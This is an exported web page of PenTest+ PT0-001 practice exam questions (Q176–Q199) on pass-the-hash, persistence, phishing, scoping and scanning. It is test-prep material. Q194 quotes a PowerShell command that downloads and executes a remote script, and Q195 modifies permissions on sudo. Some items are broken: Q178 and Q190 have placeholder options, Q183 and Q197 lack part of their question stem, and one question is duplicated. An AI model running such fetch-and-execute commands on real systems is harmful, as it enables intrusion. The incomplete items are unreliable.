This page was exported from Actual Test Materials [ http://blog.actualtests4sure.com ]
Export date: Fri Nov 15 21:30:17 2024 / +0000 GMT

Title: CompTIA PT0-001 Premium Exam Engine pdf - Download Free Updated 295 Questions [Q176-Q199]

NO.176 A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?
- Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.
- Identify the issues that can be remediated most quickly and address them first.
- Implement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities.
- Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time.

NO.177 During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement. Which of the following is the MOST likely reason why the engagement may not be able to continue?
- The consultant did not sign an NDA.
- The consultant was not provided with the appropriate testing tools.
- The company did not properly scope the project.
- The initial findings were not communicated to senior leadership.

NO.178 A penetration tester successfully exploits a Windows host and dumps the hashes. Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
- Option A
- Option B
- Option C
- Option D

NO.179 A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
- dsrm -users "DN=company.com; OU=hq CN=users"
- dsuser -name -account -limit 3
- dsquery user -inactive 3
- dsquery -o -rdn -limit 21

NO.180 A file contains several hashes. Which of the following can be used in a pass-the-hash attack?
- NTLMv2
- Kerberos
- NTLMv1
- LMv2
- NTLM

NO.181 A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).
- Convert to JAR.
- Decompile.
- Cross-compile the application.
- Convert JAR files to DEX.
- Re-sign the APK.
- Attach to ADB.

NO.182 Black box penetration testing strategy provides the tester with:
- a target list
- a network diagram
- source code
- privileged credentials
Explanation/Reference: https://www.scnsoft.com/blog/fifty-shades-of-penetration-testing

NO.183 An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO's login credentials.
- Elicitation attack
- Impersonation attack
- Spear phishing attack
- Drive-by download attack
Explanation/Reference: https://www.social-engineer.org/framework/influencing-others/elicitation/

NO.184 Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test?
(Select TWO)
- The tester discovers personally identifiable data on the system
- The system shows evidence of prior unauthorized compromise
- The system shows a lack of hardening throughout
- The system becomes unavailable following an attempted exploit
- The tester discovers a finding on an out-of-scope system

NO.185 A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
- Appendices
- Executive summary
- Technical summary
- Main body

NO.186 Which of the following BEST describes why an MSA is helpful?
- It contractually binds both parties to not disclose vulnerabilities.
- It reduces potential for scope creep.
- It clarifies the business arrangement by agreeing to specific terms.
- It defines the timelines for the penetration test.

NO.187 A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of the target hosts. The administrator claims the system is patched and the evidence is a false positive. Which of the following is the BEST method for a tester to confirm the vulnerability exists?
- Manually run publicly available exploit code.
- Confirm via evidence of the updated version number.
- Run the vulnerability scanner again.
- Perform dynamic analysis on the vulnerable service.

NO.188 Which of the following BEST protects against a rainbow table attack?
- Increased password complexity
- Symmetric encryption
- Cryptographic salting
- Hardened OS configurations
Explanation/Reference: https://www.sciencedirect.com/topics/computer-science/rainbow-table

NO.189 A penetration tester executed a vulnerability scan against a publicly accessible host and found a web server that is vulnerable to the DROWN attack. Assuming this web server is using the IP address 127.212.31.17, which of the following should the tester use to verify a false positive?
- openssl s_client -tls1_2 -connect 127.212.31.17:443
- openssl s_client -ssl2 -connect 127.212.31.17:443
- openssl s_client -ssl3 -connect 127.212.31.17:443
- openssl s_server -tls1_2 -connect 127.212.31.17:443

NO.190 A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
- Option A
- Option B
- Option C
- Option D

NO.191 After establishing a shell on a target system, Joe, a penetration tester, is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected?
- Run a zero-day exploit.
- Create a new domain user with a known password.
- Modify a known boot time service to instantiate a call back.
- Obtain cleartext credentials of the compromised user.

NO.192 Which of the following exploits a vulnerability associated with IoT devices?
- Blue snarfing
- Simple certificate enrollment
- Heartbleed
- Mirai botnet

NO.193 During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement. Which of the following is the MOST likely reason why the engagement may not be able to continue?
- The consultant did not sign an NDA.
- The consultant was not provided with the appropriate testing tools.
- The company did not properly scope the project.
- The initial findings were not communicated to senior leadership.

NO.194 Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring("http://site/script.ps1");Invoke-Cmdlet
Which of the following BEST describes the actions performed by this command?
- Set the execution policy
- Execute a remote script
- Run an encoded command
- Instantiate an object

NO.195 The following command is run on a Linux file system:
chmod 4111 /usr/bin/sudo
Which of the following issues may be exploited now?
- Kernel vulnerabilities
- Sticky bits
- Unquoted service path
- Misconfigured sudo

NO.196 A consultant wants to scan all the TCP ports on an identified device. Which of the following Nmap switches will complete this task?
- -p-
- -p ALL
- -p 1-65534
- -port 1-65534
Explanation/Reference: https://securitytrails.com/blog/top-15-nmap-commands-to-scan-remote-hosts

NO.197 A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:
* Code review
* Updates to firewall setting
- Scope creep
- Post-mortem review
- Risk acceptance
- Threat prevention

NO.198 A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural changes. Which of the following is the BEST way to approach the project?
- Design a penetration test approach, focusing on publicly released firewall DoS vulnerabilities.
- Review the firewall configuration, followed by a targeted attack by a red team.
- Perform a discovery scan to identify changes in the network.
- Focus on an objective-based approach to assess network assets with a red team.

NO.199 A security consultant is trying to attack a device with a previously identified user account. Which of the following types of attacks is being executed?
- Credential dump attack
- DLL injection attack
- Reverse shell attack
- Pass the hash attack

Post date: 2022-04-17 18:17:08
Post modified date: 2022-04-17 18:17:08